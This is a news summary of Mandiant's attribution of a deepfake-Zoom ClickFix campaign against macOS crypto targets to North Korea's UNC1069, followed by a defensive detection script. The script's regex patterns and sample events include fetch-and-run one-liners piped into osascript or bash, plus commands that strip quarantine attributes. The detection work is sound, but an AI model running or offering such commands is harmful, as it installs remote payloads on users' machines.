Particle.news

Mandiant Links AI-Driven Crypto Theft to North Korea’s UNC1069 With Seven macOS Malware Families

Researchers describe a deepfake-powered ruse that routes targets from Telegram via Calendly into spoofed Zoom meetings to trigger ClickFix commands on macOS.

Overview

  • Google Mandiant attributes a recent intrusion at a cryptocurrency firm to UNC1069, a North Korea-linked group seeking financial gain through data theft from Windows and macOS systems.
  • The operation used a compromised Telegram account posing as a crypto executive to share a Calendly invite that redirected victims to an attacker-hosted page mimicking Zoom with AI-generated or deepfake video.
  • Victims were instructed to run ClickFix-style troubleshooting commands that delivered an AppleScript dropping the WAVESHAPER binary, which then staged HYPERCALL, HIDDENCALL, and SUGARLOADER.
  • Up to seven macOS malware families were deployed, including the newly observed DEEPBREATH, CHROMEPUSH, and SILENCELIFT, which bypass macOS protections to exfiltrate keychain entries, browser data, Telegram content, and Apple Notes.
  • Mandiant highlights the unusually heavy tooling deployed per host to harvest credentials and session tokens for cryptocurrency theft, noting the group’s shift since 2023 toward Web3 and crypto targets and overlap with the activity Kaspersky tracks as GhostCall.
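The chain summarised above, a user pasting a "troubleshooting" one-liner into Terminal that fetches and runs an AppleScript, leaves a recognisable footprint in process telemetry. The script below is an added example, not code from the Particle.news page or from Mandiant's report: it scores constructed macOS process-execution records against a small set of ClickFix-style heuristics (a network fetch piped into an interpreter, osascript invoked from an interactive shell, quarantine attributes stripped, a downloaded file made executable). The record field names, the patterns, their weights, the threshold, and the sample events with their `.invalid` hostnames are all assumptions for illustration.

```python
"""Heuristic hunt for ClickFix-style execution chains on macOS.

Added example, not Mandiant's detection logic. Field names, patterns,
weights and sample events are assumptions chosen for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent process name (assumed field name)
    user: str
    cmdline: str   # full command line of the new process


# (pattern, weight, reason). Weights are a judgement call, not a standard.
INDICATORS = [
    (re.compile(r"\bosascript\b"), 1,
     "AppleScript interpreter invoked"),
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|zsh|osascript)\b"), 2,
     "remote content piped straight into an interpreter"),
    (re.compile(r"\bbase64\s+(-d|-D|--decode)\b"), 1,
     "inline base64 decode"),
    (re.compile(r"\bxattr\b.*(\s-c\b|com\.apple\.quarantine)"), 2,
     "Gatekeeper quarantine attribute stripped"),
    (re.compile(r"\bchmod\s+\+x\b"), 1,
     "downloaded file made executable"),
]

# Parents that mean a human typed or pasted the command (assumed set).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "zsh", "bash"}


def score_event(ev):
    """Return (score, reasons) for one process-execution record."""
    score, reasons = 0, []
    for rx, weight, why in INDICATORS:
        if rx.search(ev.cmdline):
            score += weight
            reasons.append(why)
    # A pasted "fix" command is run from an interactive shell; only add the
    # bonus when some other indicator already fired, so plain shell use
    # does not score on its own.
    if score and ev.parent in INTERACTIVE_PARENTS:
        score += 1
        reasons.append("run from an interactive shell, consistent with a pasted 'fix' command")
    return score, reasons


def hunt(events, threshold=3):
    """Return [(event, score, reasons)] for events at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample telemetry; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcEvent("Terminal", "alice",
              '/bin/zsh -c "curl -fsSL https://meeting-fix.example.invalid/fix.txt | osascript"'),
    ProcEvent("Terminal", "alice",
              "osascript -e 'display notification \"build finished\"'"),
    ProcEvent("bash", "bob",
              "curl -fsSL https://tools.example.invalid/install.sh | bash"),
    ProcEvent("Terminal", "carol",
              "xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update"),
    ProcEvent("launchd", "_spotlight",
              "/System/Library/Frameworks/CoreServices.framework/Frameworks/"
              "Metadata.framework/Versions/A/Support/mdworker_shared"),
]


if __name__ == "__main__":
    for ev, score, reasons in hunt(SAMPLE_EVENTS):
        print(f"[{score}] {ev.user} via {ev.parent}: {ev.cmdline}")
        for r in reasons:
            print(f"      - {r}")
```

Of the five constructed records, three cross the threshold: the fetch-and-osascript one-liner, the quarantine strip plus execute, and a curl-into-bash installer. The last is the usual false positive for this class of rule; in practice it is handled by allowlisting known installer hosts or by escalating only when the piped interpreter is osascript, rather than by raising the threshold until the AppleScript case also disappears.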